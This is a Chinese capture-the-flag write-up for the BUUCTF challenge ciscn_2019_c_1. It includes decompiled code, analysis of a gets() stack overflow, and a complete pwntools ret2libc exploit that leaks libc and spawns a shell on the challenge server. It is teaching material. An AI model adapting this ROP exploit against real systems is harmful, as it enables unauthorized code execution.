1
2
3
4
5
6
[*] '/mnt/e/work/PWN/buuctf/ciscn_2019_c_1/pwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

ida64

main

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+Ch] [rbp-4h] BYREF

  init();
  puts("EEEEEEE                            hh      iii                ");
  puts("EE      mm mm mmmm    aa aa   cccc hh          nn nnn    eee  ");
  puts("EEEEE   mmm  mm  mm  aa aaa cc     hhhhhh  iii nnn  nn ee   e ");
  puts("EE      mmm  mm  mm aa  aaa cc     hh   hh iii nn   nn eeeee  ");
  puts("EEEEEEE mmm  mm  mm  aaa aa  ccccc hh   hh iii nn   nn  eeeee ");
  puts("====================================================================");
  puts("Welcome to this Encryption machine\n");
  begin();
  while ( 1 )
  {
    while ( 1 )
    {
      fflush(0LL);
      v4 = 0;
      __isoc99_scanf("%d", &v4);
      getchar();
      if ( v4 != 2 )
        break;
      puts("I think you can do it by yourself");
      begin();
    }
    if ( v4 == 3 )
    {
      puts("Bye!");
      return 0;
    }
    if ( v4 != 1 )
      break;
    encrypt();
    begin();
  }
  puts("Something Wrong!");
  return 0;
}

main函数主要是在做选择 不存在栈溢出

encrypt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
int encrypt()
{
  size_t v0; // rbx
  char s[48]; // [rsp+0h] [rbp-50h] BYREF
  __int16 v3; // [rsp+30h] [rbp-20h]

  memset(s, 0, sizeof(s));
  v3 = 0;
  puts("Input your Plaintext to be encrypted");
  gets(s);
  while ( 1 )
  {
    v0 = (unsigned int)x;
    if ( v0 >= strlen(s) )
      break;
    if ( s[x] <= 96 || s[x] > 122 )
    {
      if ( s[x] <= 64 || s[x] > 90 )
      {
        if ( s[x] > 47 && s[x] <= 57 )
          s[x] ^= 0xFu;
      }
      else
      {
        s[x] ^= 0xEu;
      }
    }
    else
    {
      s[x] ^= 0xDu;
    }
    ++x;
  }
  puts("Ciphertext");
  return puts(s);
}

这一串是关键函数 看到了高危函数get(s) 存在栈溢出 算溢出值为0x50+0x8

shfit+f12后可以看到字符串中没有bin/sh或cat flag等关键字眼 可以想到这题考的可能是ret2libc(因为其他的我也不会)

image-20231023133230513

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
from pwn import *
from LibcSearcher import *
context(
    terminal=["wt.exe", "wsl"],
    os = "linux",
    arch ='amd64',
    #arch = "i386",
    log_level='debug'
)
elf = ELF('./pwn')
#io = process('./pwn')
#libc = ELF("")
io = remote("node4.buuoj.cn",29396)
def debug():
    gdb.attach(io)
    pause()
#code here
#debug()
offset = 0x50+0x8
scanf_got = elf.got['__isoc99_scanf']
puts_plt = elf.plt['puts']
pop_rdi = 0x400c83
ret_addr = 0x4006b9
encrypt_addr = elf.sym['encrypt']
main_addr = elf.sym['main']
init_addr = elf.sym['init']
payload1 = cyclic(offset)+p64(pop_rdi)+ p64(scanf_got)+p64(puts_plt)+p64(encrypt_addr)
io.sendlineafter ('choice!','1')
io.sendlineafter('encrypted\n',payload1)
io.recvuntil('@\n')
scanf_addr = u64(io.recvline()[:-1].ljust(8,b'\x00'))#固定
print(hex(scanf_addr))
libc = LibcSearcher('__isoc99_scanf', scanf_addr)
libc_base = scanf_addr - libc.dump('__isoc99_scanf')
system = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')
payload2 = cyclic(offset)+p64(ret_addr)+p64(pop_rdi)+p64(bin_sh)+p64(system)
io.sendlineafter('encrypted\n',payload2)
io.interactive()

值得注意是 这题需要栈对齐 需要加上ret_addr的值